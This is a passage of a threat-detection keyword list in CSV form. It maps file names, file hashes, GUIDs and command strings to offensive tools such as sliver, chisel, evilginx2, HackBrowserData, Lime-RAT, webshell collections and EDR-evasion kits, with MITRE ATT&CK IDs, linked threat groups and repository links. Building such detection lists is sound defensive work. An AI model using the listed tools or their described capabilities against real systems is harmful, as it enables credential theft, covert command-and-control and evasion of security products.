"*abpttsfactory.py*",".{0,1000}abpttsfactory\.py.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","1","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","33046"
"*AbuseGithubAPI*.cpp*",".{0,1000}AbuseGithubAPI.{0,1000}\.cpp.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","33047"
"*AbuseGithubAPI*.exe*",".{0,1000}AbuseGithubAPI.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","0","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","33048"
"*ac03d370bbdfc9037c1dfb4fc9a4fc5a3914acb58e082a33fc5c52bdbc8768f4*",".{0,1000}ac03d370bbdfc9037c1dfb4fc9a4fc5a3914acb58e082a33fc5c52bdbc8768f4.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","33051"
"*ac0a36687a87166b27a9d2f4c041e5131b3aca69ab811086591117bd7f3b7eb3*",".{0,1000}ac0a36687a87166b27a9d2f4c041e5131b3aca69ab811086591117bd7f3b7eb3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33053"
"*ac0b5929af1c06ef6d9655a5856c2ac6908c9f4979bd2a7c12f30562fd7f7520*",".{0,1000}ac0b5929af1c06ef6d9655a5856c2ac6908c9f4979bd2a7c12f30562fd7f7520.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33054"
"*ac0eb86fafd0ca2e1450238cfb023c1c82b6d24fec249623ff1d0e161b7727c6*",".{0,1000}ac0eb86fafd0ca2e1450238cfb023c1c82b6d24fec249623ff1d0e161b7727c6.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","33056"
"*ac0eb86fafd0ca2e1450238cfb023c1c82b6d24fec249623ff1d0e161b7727c6*",".{0,1000}ac0eb86fafd0ca2e1450238cfb023c1c82b6d24fec249623ff1d0e161b7727c6.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","#filehash","N/A","9","10","N/A","N/A","N/A","N/A","33057"
"*ac13e657c6b4d2526c00443025cc5a142439b952ea269e20a2d64fa2da712c42*",".{0,1000}ac13e657c6b4d2526c00443025cc5a142439b952ea269e20a2d64fa2da712c42.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33058"
"*ac208550f9e5497ef437b924f8e284359c7cdff98f2d1924d212821ae544940d*",".{0,1000}ac208550f9e5497ef437b924f8e284359c7cdff98f2d1924d212821ae544940d.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33063"
"*ac22717875ec08d5ca32ca6b1846917e63f8a4db4de56138f782ac231e9a784f*",".{0,1000}ac22717875ec08d5ca32ca6b1846917e63f8a4db4de56138f782ac231e9a784f.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33064"
"*ac22d31fa6c3525c62ae4c2536d27ef042d37a23a76691519bfd72671d313fef*",".{0,1000}ac22d31fa6c3525c62ae4c2536d27ef042d37a23a76691519bfd72671d313fef.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33065"
"*ac237c0f9cc970822dee74c4251b50a87c637af3d8b087ceb5162aaee4b67381*",".{0,1000}ac237c0f9cc970822dee74c4251b50a87c637af3d8b087ceb5162aaee4b67381.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","33066"
"*ac24f9111a5e72c85f2b32ce3c09f46814363c98383be1e972839d89b1a3d18c*",".{0,1000}ac24f9111a5e72c85f2b32ce3c09f46814363c98383be1e972839d89b1a3d18c.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","33067"
"*ac26616ae7d5b4516fa1a182a49dd3466e337a6fc13a4373f9cf3f973d83a173*",".{0,1000}ac26616ae7d5b4516fa1a182a49dd3466e337a6fc13a4373f9cf3f973d83a173.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","33068"
"*ac2d0b0b024bc8584bcaf30d16b3ccc876fe0fca14e2907e56b928514c8d61c6*",".{0,1000}ac2d0b0b024bc8584bcaf30d16b3ccc876fe0fca14e2907e56b928514c8d61c6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","33070"
"*ac3107cf-291c-449b-9121-55cd37f6383e*",".{0,1000}ac3107cf\-291c\-449b\-9121\-55cd37f6383e.{0,1000}","offensive_tool_keyword","Necro-Stealer","C++ stealer (passwords - cookies - forms - cards - wallets) ","T1078 - T1114 - T1555 - T1539 - T1212 - T1132","TA0006  - TA0010","N/A","N/A","Credential Access","https://github.com/SecUser1/Necro-Stealer","1","0","#GUIDproject","N/A","8","1","6","1","2022-12-06T16:06:55Z","2022-12-06T15:52:17Z","33071"
"*ac32a19580d4f26d045e8555fb3b9f1415a45af8cbc3a67ea8d9c49dba11cdf1*",".{0,1000}ac32a19580d4f26d045e8555fb3b9f1415a45af8cbc3a67ea8d9c49dba11cdf1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33072"
"*ac398617ce13e70e253f59d8d41c1c3c0f70875c6acd40634b1125d9a5fc20c2*",".{0,1000}ac398617ce13e70e253f59d8d41c1c3c0f70875c6acd40634b1125d9a5fc20c2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33073"
"*ac4319f7349146fa891f608416dbf40475ebfdbbbec155939eb34d8fa1a67079*",".{0,1000}ac4319f7349146fa891f608416dbf40475ebfdbbbec155939eb34d8fa1a67079.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","33075"
"*ac4329a75f33a71b5b4ece7aeae9d6e09e99b033809b85b7f1ebb2e80f32ab3a*",".{0,1000}ac4329a75f33a71b5b4ece7aeae9d6e09e99b033809b85b7f1ebb2e80f32ab3a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33076"
"*ac4638d1cbe7a1db75e200b8ef62be5b5311fe858450d7562b86bf94c17d1d0f*",".{0,1000}ac4638d1cbe7a1db75e200b8ef62be5b5311fe858450d7562b86bf94c17d1d0f.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","33077"
"*ac49d2041cd57b1efba672c3305b621ebb265380010b8951cda01c055a7e1e64*",".{0,1000}ac49d2041cd57b1efba672c3305b621ebb265380010b8951cda01c055a7e1e64.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","#filehash","N/A","8","4","333","36","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z","33078"
"*ac518d48ff20843cd624d2e530d6a507d412ef7749421bf39cd7f23eb817f11c*",".{0,1000}ac518d48ff20843cd624d2e530d6a507d412ef7749421bf39cd7f23eb817f11c.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","33079"
"*ac573a39363e52c1f32be7f75d8eeffae5bf21689b6f07804e1f5c667c40f6be*",".{0,1000}ac573a39363e52c1f32be7f75d8eeffae5bf21689b6f07804e1f5c667c40f6be.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","33080"
"*ac62eec9b4b7616cd207fda9ff22de6905f3872dcc81d03e5d67fe87e4e3b448*",".{0,1000}ac62eec9b4b7616cd207fda9ff22de6905f3872dcc81d03e5d67fe87e4e3b448.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","33082"
"*ac66758a6f95a4ec9aadef67b4bb85dec9aaa8fd98f0f52cbdfe519ac1c78d77*",".{0,1000}ac66758a6f95a4ec9aadef67b4bb85dec9aaa8fd98f0f52cbdfe519ac1c78d77.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","33083"
"*ac6ae000d13f06fd4a0f87af57a2dcc4559fc5d5aa4cc7a1606139ffa85cf473*",".{0,1000}ac6ae000d13f06fd4a0f87af57a2dcc4559fc5d5aa4cc7a1606139ffa85cf473.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33084"
"*ac6ffecbe45068d2dad0314da15f3b193eef94fd005d24646ed246d69bbb6782*",".{0,1000}ac6ffecbe45068d2dad0314da15f3b193eef94fd005d24646ed246d69bbb6782.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33086"
"*ac77cefd856217e33d5acc730ea62c1a63e77a7a2fdd587d6d9bbfcea3e4da1d*",".{0,1000}ac77cefd856217e33d5acc730ea62c1a63e77a7a2fdd587d6d9bbfcea3e4da1d.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#filehash","N/A","8","10","1451","235","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z","33088"
"*ac9215db682509ab2bdcba7fe924d84dafa1d8aade87172c1c6328b2cb6c9e52*",".{0,1000}ac9215db682509ab2bdcba7fe924d84dafa1d8aade87172c1c6328b2cb6c9e52.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","#filehash","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","33089"
"*ac924e7efddd20c4d783e7a0a30d6d8925f5a077b9450a49bed32a0b0bb255fd*",".{0,1000}ac924e7efddd20c4d783e7a0a30d6d8925f5a077b9450a49bed32a0b0bb255fd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33090"
"*ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753*",".{0,1000}ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","33091"
"*aca56ff9f53e0eb7aa21022d1878c645badcc301aff0277794450830b14905c8*",".{0,1000}aca56ff9f53e0eb7aa21022d1878c645badcc301aff0277794450830b14905c8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33094"
"*aca84bf57ae794734cda84fb8208abed12a248067e7012c2fde2718dce7b41b3*",".{0,1000}aca84bf57ae794734cda84fb8208abed12a248067e7012c2fde2718dce7b41b3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","33096"
"*aca998015730e52a8f984a025bc4cd5ec31b0aa783828ab1a6159d7082aca0e8*",".{0,1000}aca998015730e52a8f984a025bc4cd5ec31b0aa783828ab1a6159d7082aca0e8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","33097"
"*acac4db9c3f6c44711409a3fb564de89a747643d53b8d65c9c3a06e56f28875f*",".{0,1000}acac4db9c3f6c44711409a3fb564de89a747643d53b8d65c9c3a06e56f28875f.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","33098"
"*acacad2cec4f7abe6f054e451bfe9d2b5e816d74c94f17b8cb38300a1f2851e8*",".{0,1000}acacad2cec4f7abe6f054e451bfe9d2b5e816d74c94f17b8cb38300a1f2851e8.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","33099"
"*acb2c4419a7aa4cb0b812a179bdd51d579c0cc1f193b1b8911d64b2d3ff8f450*",".{0,1000}acb2c4419a7aa4cb0b812a179bdd51d579c0cc1f193b1b8911d64b2d3ff8f450.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","33100"
"*acb7923ed1efb328d724977f2507a7a721a6c7cf630a3b37a9f4d7a3a2c7010c*",".{0,1000}acb7923ed1efb328d724977f2507a7a721a6c7cf630a3b37a9f4d7a3a2c7010c.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","33101"
"*ACBypassTest*",".{0,1000}ACBypassTest.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Invoke-FodHelperBypass.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","33102"
"*acc6cd307e1dd184b722a082c177639e78421f79b0e3b26fa602f1ce8392cc4f*",".{0,1000}acc6cd307e1dd184b722a082c177639e78421f79b0e3b26fa602f1ce8392cc4f.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004 - T1621","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","#filehash","N/A","9","10","1070","142","2025-03-19T20:36:21Z","2020-09-25T20:57:42Z","33103"
"*acc8594a9f95436e4e4a79fda6e54afad42acc212baaa52b442a161f115379d0*",".{0,1000}acc8594a9f95436e4e4a79fda6e54afad42acc212baaa52b442a161f115379d0.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","33104"
"*acc8e858d44f1310d7c9f6d2544f7a004165279132f6433271b59b73f540dbde*",".{0,1000}acc8e858d44f1310d7c9f6d2544f7a004165279132f6433271b59b73f540dbde.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","33105"
"*acc9c65557132735ab0c7aae5bb2e2f996ab24508b37e62a8bb1024f3e1f1b14*",".{0,1000}acc9c65557132735ab0c7aae5bb2e2f996ab24508b37e62a8bb1024f3e1f1b14.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","33106"
"*Accenture/Spartacus*",".{0,1000}Accenture\/Spartacus.{0,1000}","offensive_tool_keyword","Spartacus","Spartacus DLL/COM Hijacking Toolkit","T1574.001 - T1055.001 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Accenture/Spartacus","1","1","N/A","N/A","10","10","1037","141","2024-02-01T13:51:09Z","2022-10-28T09:00:35Z","33108"
"*Access_Check -Method PSRemoting*",".{0,1000}Access_Check\s\-Method\sPSRemoting.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","33109"
